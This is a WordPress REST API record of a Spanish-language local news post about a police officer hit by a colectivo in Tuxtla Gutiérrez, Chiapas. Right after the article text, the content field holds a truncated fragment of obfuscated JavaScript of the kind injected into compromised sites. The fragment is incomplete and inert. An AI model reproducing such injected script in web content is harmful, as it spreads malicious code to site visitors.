{"id":4575,"date":"2022-08-22T01:23:57","date_gmt":"2022-08-22T01:23:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4575"},"modified":"2022-08-22T01:23:58","modified_gmt":"2022-08-22T01:23:58","slug":"policia-fue-atropellado-por-colectivo-en-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4575","title":{"rendered":"Polic\u00eda fue atropellado por colectivo en el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661131357156-768x1024.jpg\" alt=\"\" class=\"wp-image-4576\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661131357156-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661131357156-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1661131357156.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un elemento de la Secretar\u00eda de Seguridad P\u00fablica y Tr\u00e1nsito Municipal result\u00f3 herido tras ser atropellado por un colectivo cuando circulaba a la altura de la  Segunda Sur y Novena Poniente del Barrio El Cerrito,  en el centro de Tuxtla.El reporte oficial inform\u00f3 que,  el polic\u00eda circulaba en la unidad PCC 545 de Norte a Sur sobre la 9a Poniente cuando el colectivo se atraves\u00f3 y no pudo evitar el impacto.Por el golpe, el uniformado identificado como Royer sali\u00f3 volando y se estrell\u00f3 contra el pavimento. Los pasajeros de la unidad tambi\u00e9n resultaron lesionados por el impacto.Param\u00e9dicos del ERUM  y de la Cruz Roja Mexicana,  arribaron al lugar para atender a siete heridos.El elemento fue trasladado a un nosocomio para su atenci\u00f3n m\u00e9dica especializada donde se dio a conocer que present\u00f3 una fractura en la pierna derecha. El conductor del colectivo asumi\u00f3 la responsabilidad del siniestro.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un elemento de la Secretar\u00eda de Seguridad P\u00fablica y Tr\u00e1nsito Municipal result\u00f3 herido tras ser atropellado por un colectivo cuando circulaba a la altura de la Segunda Sur y Novena Poniente del Barrio El Cerrito, en el centro de Tuxtla.El reporte oficial inform\u00f3 que, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4576,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4575","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4575"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4575\/revisions"}],"predecessor-version":[{"id":4577,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4575\/revisions\/4577"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4576"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}